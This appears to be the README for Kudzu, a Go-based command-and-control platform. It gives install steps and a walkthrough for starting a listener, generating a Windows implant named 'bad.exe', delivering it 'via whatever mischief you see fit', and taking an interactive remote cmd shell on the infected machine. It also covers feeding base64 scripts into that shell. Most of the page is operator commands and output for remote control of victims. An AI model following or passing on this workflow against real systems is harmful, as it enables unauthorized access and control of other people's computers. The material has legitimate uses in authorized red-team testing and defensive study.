Kudzu
An extensible Go C2 platform
Overview
Kudzu is a Go based C2 platform with an emphasis on extensibility. My goal was to provide a platform to which new scripts and exploits could be easily added and modified, and written in a modern language. It is a lofty goal, especially for a lone coder of dubious skill, but with enough time, determination, and caffeine, great things are possible!
Quick Start
Installation
Windows:
>> go get -u github.com/TerminalJockey/Kudzu
>> cd %GOPATH%\src\github.com\TerminalJockey\Kudzu
>> go build -o KudzuConsole.exe main.go
>> KudzuConsole.exeLinux:
>> go get -u github.com/TerminalJockey/Kudzu
>> cd ~/go/src/github.com/TerminalJockey/Kudzu
>> go build -o KudzuConsole main.go
>> sudo ./KudzuConsoleUsage
The usual workflow is as follows:
Start listener
<kudzu> nodes
<kudzu nodes> setop nodetype tcp
<kudzu nodes> setop addr 127.0.0.1
<kudzu nodes> setop port 31337
<kudzu nodes> run
<kudzu nodes> ls
Nodes:
Listeners:
6e770a3487 127.0.0.1:7896
<kudzu nodes>Generate implant
<kudzu> implants
<kudzu implants> setop filename bad.exe
<kudzu implants> setop listener 6e770a3487
<kudzu implants> setop implanttype cmd
<kudzu implants> run
{cmd {6e770a3487 0xc0000049e0}}
proceed? Y/N > y
generated implant! check ../tmp/
<kudzu implants>Deliver your implant via whatever mischief you see fit (???)
Profit!
<kudzu implants> Got Connection ID: 34ffa7713f 127.0.0.1:7896
<kudzu implants> nodes
<kudzu nodes> interact 34ffa7713f
interacting...
34ffa7713f
found node for interaction
Microsoft Windows [Version REDACTED]
(c) 31337 Microsoft Corporation. All rights reserved.
C:\Users\TESTER\>whoami
desktop\TESTER
C:\Users\TESTER\>Notes
Each menu has a help option, and you can swap to your desired menu simply by typing the relevant keyword as shown above.
Using the runscript command while in an implant cmdshell causes the base64 script contents to be written to the cmdshell's stdin. While it doesnt look like anything is executed or submitted, it is unintended and may (read will likely) generate some weird looking traffic.
Last updated
Was this helpful?